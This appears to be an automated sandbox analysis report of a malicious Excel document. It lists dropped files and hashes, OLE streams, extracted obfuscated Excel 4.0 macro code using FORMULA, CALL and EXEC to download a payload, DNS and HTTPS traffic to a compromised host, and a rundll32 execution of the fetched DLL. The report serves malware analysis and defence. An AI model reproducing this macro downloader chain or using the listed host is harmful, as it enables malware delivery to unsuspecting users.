                SHA1:856C4FD41D44EA9190C5F4ACCF9C919807CEB35C
                SHA-256:465AC91E180F9C6C74EC1C28D3C4C9951CE6585D98AE41C8AF87CE2B53487B84
                SHA-512:01DF566B09975FD427F2741736CE66EF52620AE29885EF110605683556B6F079E795321F0D24701C6218C9B633852C06D319A36AFDAD6B281EA451F581AA0103
                Malicious:false
                Reputation:low
                Preview: p...... ....`...c..X....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                C:\Users\user\AppData\Local\Temp\CBDE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):65280
                Entropy (8bit):7.696599199500836
                Encrypted:false
                SSDEEP:1536:wqcJEaiqSiBjAdwroSgiB9uCbMljf2fu9X9bGi2vK6WXfkb:wqGEySOjVuiTuColjf2faNbov/WMb
                MD5:58B024C10F6E73A5C26740D81ED61038
                SHA1:A24C2DDFBA84AD9207CCD1C5EC9D4AC075C10E54
                SHA-256:9DBE7F8D59B5C7BCD3F42DE2312DEB325F88E2AE6E2D425A91CB2E1BA167C4C2
                SHA-512:4E8CA43AF7C1E10C67963AA081A2957150083FA5874995954898019F423EADE99672FA85262414B2F9BAED139DBF81FAF9C79F00EE1685DCCD3CFD3A576307B1
                Malicious:false
                Reputation:low
                Preview: ..N.0...W.."....j.....$....4..?....q..P...J.4m.s.7.t<.\.]<c....U.V..N*.....o...1......1.......c,Hmc...o.h.@..GK+...$....A,.A~>.\p.lB..=.l....Sq.....o.V\m..Q5S&..}.S1WvK..k% Qi...-..-.J.t...L.}@..ELFW>(b....."~..P..B.>T...b.|<.f}..W...mU..60(....t....W.....;......X.J....+.".k.s......I.w..OD..I..F..3...{..?.i......2.7`.e..S...?..#...y...7..........%..P.'......z.p../..._....h$W..W-M.#7...O3..8.. .x8.........p..f.H........1'Q....:........PK..........!...l.............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\CabE5AF.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\Local\Temp\TarE5B0.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):152788
                Entropy (8bit):6.316654432555028
                Encrypted:false
                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                MD5:64FEDADE4387A8B92C120B21EC61E394
                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 03:35:41 2021, atime=Tue Feb 23 03:35:41 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.485120499512926
                Encrypted:false
                SSDEEP:12:85QZ3WHcLgXg/XAlCPCHaXtB8XzB/0kiX+WnicvbkGeObDtZ3YilMMEpxRljKtTg:85wGq/XTd6j4Ye3eCDv3qwrNru/
                MD5:5716FCBCF49473B7E0DA6C6C0C4532E7
                SHA1:2B40EB010C5F7323D577A1DA37964FD1D46BCF96
                SHA-256:4C386546A9B805DCB2585CEADA06D1E92587182E13F3D0599AC30C10E133FF40
                SHA-512:C2025D5B84DDF8D232FEDE497CF7706AD019C9B24604DA7F344BC7598D18E8CD4FB4556C2289E74C5A75891116A801026B4DE0E4566944364DFEDE17E565E3D4
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G.....W.......W..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WRu$..Desktop.d......QK.XWRu$*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-550193913.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Tue Feb 23 03:35:41 2021, atime=Tue Feb 23 03:35:41 2021, length=93184, window=hide
                Category:dropped
                Size (bytes):2108
                Entropy (8bit):4.528033883396002
                Encrypted:false
                SSDEEP:48:8Za/XT0jqOAjMCsSwQh2Za/XT0jqOAjMCsSwQ/:8Za/XojqOABwQh2Za/XojqOABwQ/
                MD5:63FCE306E198EA4256E660312C9938A2
                SHA1:ED457BEBEE3B0300C50E372D914024B3B814D9B9
                SHA-256:2786F3CC08E726B768C679676BA391D2C3FEC85315D271B8FA71108EDA611041
                SHA-512:49DCE70DEA6A90A1A083DD4BA7566043E32D62059FACDBE1EB8F43F8C997E6380F516F871C6649B631F7A16CE37D6F528CF28D0F9AA5A5540A81D67EB225EB01
                Malicious:false
                Reputation:low
                Preview: L..................F.... ....(...{.....W....cO.W.....l...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..n..WRr$ .DOCUME~1.XLS..Z.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.5.5.0.1.9.3.9.1.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\document-550193913.xls.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.5.5.0.1.9.3.9.1.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):107
                Entropy (8bit):4.704136640648724
                Encrypted:false
                SSDEEP:3:oyBVomMY9LRzcWl2ulZELRzcWl2ulmMY9LRzcWl2ulv:dj6Y9LVl1ELVlPY9LVlL
                MD5:59D6E0A6C21A61366968A28C51B556C3
                SHA1:49C4F33DF0D414B6C8B50FE89D9AA393E44F207D
                SHA-256:540F24527642B86B694E23E030BA76E54DDE40B7862F356D9E284A6A232FC0A2
                SHA-512:A1DF2037139ABADB3EF4067A28C9E7272BA61224F2A8589D440586B7B945EB5BBAF2D9DF3DB53611B373AF0DD9BA6020DF865F0FBE7CD9C8D94988F13E202293
                Malicious:false
                Preview: Desktop.LNK=0..[xls]..document-550193913.LNK=0..document-550193913.LNK=0..[xls]..document-550193913.LNK=0..
                C:\Users\user\Desktop\ACDE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Applesoft BASIC program data, first line number 16
                Category:dropped
                Size (bytes):143400
                Entropy (8bit):4.4844677313630505
                Encrypted:false
                SSDEEP:3072:oJxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFV1XU8mJxEtjPOtioVjDGUU1qfDlaGh:ixEtjPOtioVjDGUU1qfDlavx+W2QnAFi
                MD5:3BFBAD31205430D69DB51B2F5130C358
                SHA1:07777FAAFE7F2071CA21026BD1C563A2E538DA87
                SHA-256:03B7624902D8B7BFCBFB1D4E1743A710D325169DDB263D3C03A6EF8795DE861C
                SHA-512:768FBB51D44CA2975199171CA673B3480722E0613399C58B3FDD76FEDB41862EC16D725F2C40FC03E388F4A19EDB036D32A09C96955505B615BFFDCF60CBB3BD
                Malicious:false
                Preview: ........g2.........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 22 11:59:11 2021, Security: 0
                Entropy (8bit):3.4738983608957428
                TrID:
                • Microsoft Excel sheet (30009/1) 78.94%
                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                File name:document-550193913.xls
                File size:93696
                MD5:4107cd071635b4cc3689f77c688f57c3
                SHA1:cf6dea64431b614757906f32d3d1f016b5afdbb5
                SHA256:d49b40d468269f57fb87ea6ad7fd8bb303fbeb033dbd45fb4967c34c5dfbc2ed
                SHA512:ae568d93ef0c9cea430e18bdf5a27cb5e71fe2e13cfca9c508f196aead42d7a1e68dd863587a0549391b7c08af85de9e6db574c9d819422482ed6529df52c0fb
                SSDEEP:1536:ca7uDphYHceXVhca+fMHLtyeGxcl8O9pTINXUOmRwb05SXw1OTsRKvoNGrEJq7TT:ca7uDphYHceXVhca+fMHLtyeGxcl8O9m
                File Content Preview:........................>......................................................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "document-550193913.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2021-02-22 11:59:11
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:917504

                Streams

                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.337819969156
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.250492291218
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83101
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:83101
                Entropy:3.68114146554
                Base64 Encoded:True
                Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                Macro 4.0 Code

                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AS110&Doc2!AS111&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AT110,AE15)","=FORMULA(Doc2!AV105&Doc2!AV107&Doc2!AV109,AF15)",,,,,,,,,,,,,,,,=AE14(),=before.2.6.28.sheet!AD19(),=AJ19(),,,,,,,,,=before.2.6.28.sheet!AF20(),,,,,,,,,,,,,,,,"=REPLACE(Doc2!AP102&Doc2!AQ102,6,1,before.2.6.28.sheet!AE19)",,,,,,"=REPLACE(Doc2!AT94,6,1,Doc2!AT95)",,"=CALL(AF15,before.2.6.28.sheet!AD21&before.2.6.28.sheet!AD20&before.2.6.28.sheet!AD19&""A"",""JJC""&""CBB"",0,Doc3!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AT99,0)","=REPLACE(Doc2!AP103,7,7,Doc2!AP101&Doc2!AQ101)",,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.6.28.sheet!AD15&Doc2!AT99&before.2.6.28.sheet!AE15&AJ19)",,,,=AL19(),,=AF17(),"=REPLACE(Doc2!AP104&Doc2!AQ104&Doc2!AR104,7,7,"""")",,=HALT(),,,,,,,=before.2.6.28.sheet!AF14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Feb 22, 2021 20:36:20.178004026 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:20.354383945 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:20.354538918 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:20.377919912 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:20.552006006 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:20.559294939 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:20.559331894 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:20.559365988 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:20.559446096 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:20.559478998 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:20.597441912 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:20.768651009 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:20.768876076 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:22.337011099 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:22.552406073 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:22.809874058 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:22.809968948 CET44349165208.91.199.118192.168.2.22
                Feb 22, 2021 20:36:22.810028076 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:22.810611963 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:22.810627937 CET49165443192.168.2.22208.91.199.118
                Feb 22, 2021 20:36:22.976635933 CET44349165208.91.199.118192.168.2.22

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Feb 22, 2021 20:36:20.104002953 CET5219753192.168.2.228.8.8.8
                Feb 22, 2021 20:36:20.164762974 CET53521978.8.8.8192.168.2.22
                Feb 22, 2021 20:36:21.079830885 CET5309953192.168.2.228.8.8.8
                Feb 22, 2021 20:36:21.139955044 CET53530998.8.8.8192.168.2.22
                Feb 22, 2021 20:36:21.163115978 CET5283853192.168.2.228.8.8.8
                Feb 22, 2021 20:36:21.212127924 CET53528388.8.8.8192.168.2.22
                Feb 22, 2021 20:36:21.754522085 CET6120053192.168.2.228.8.8.8
                Feb 22, 2021 20:36:21.815949917 CET53612008.8.8.8192.168.2.22
                Feb 22, 2021 20:36:21.829842091 CET4954853192.168.2.228.8.8.8
                Feb 22, 2021 20:36:21.896408081 CET53495488.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Feb 22, 2021 20:36:20.104002953 CET192.168.2.228.8.8.80xb648Standard query (0)helendunnosteopathy.co.ukA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Feb 22, 2021 20:36:20.164762974 CET8.8.8.8192.168.2.220xb648No error (0)helendunnosteopathy.co.uk208.91.199.118A (IP address)IN (0x0001)

                HTTPS Packets

                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                Feb 22, 2021 20:36:20.559365988 CET208.91.199.118443192.168.2.2249165CN=cpcalendars.helendunnosteopathy.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Jan 30 12:12:51 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Apr 30 13:12:51 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:20:35:39
                Start date:22/02/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fe00000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:20:35:44
                Start date:22/02/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\rieuro.vnt,DllRegisterServer
                Imagebase:0xffdb0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >